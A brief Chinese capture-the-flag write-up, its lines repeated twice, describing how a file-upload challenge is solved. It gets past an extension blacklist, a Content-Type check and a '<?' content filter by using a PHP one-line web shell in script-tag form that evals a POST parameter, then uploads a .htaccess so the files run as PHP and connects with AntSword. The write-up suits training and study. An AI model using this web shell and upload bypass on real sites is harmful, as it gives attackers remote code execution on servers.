尝试各种文件,黑名单过滤后缀ph,content-type限制image/jpeg
内容过滤<?,木马改用<script language='php'>@eval($_POST['cmdjs']);</script>
上传.htaccess将上传的文件当作php解析
蚁剑连接得到flag
尝试各种文件,黑名单过滤后缀ph,content-type限制image/jpeg
内容过滤<?,木马改用<script language='php'>@eval($_POST['cmdjs']);</script>
上传.htaccess将上传的文件当作php解析
蚁剑连接得到flag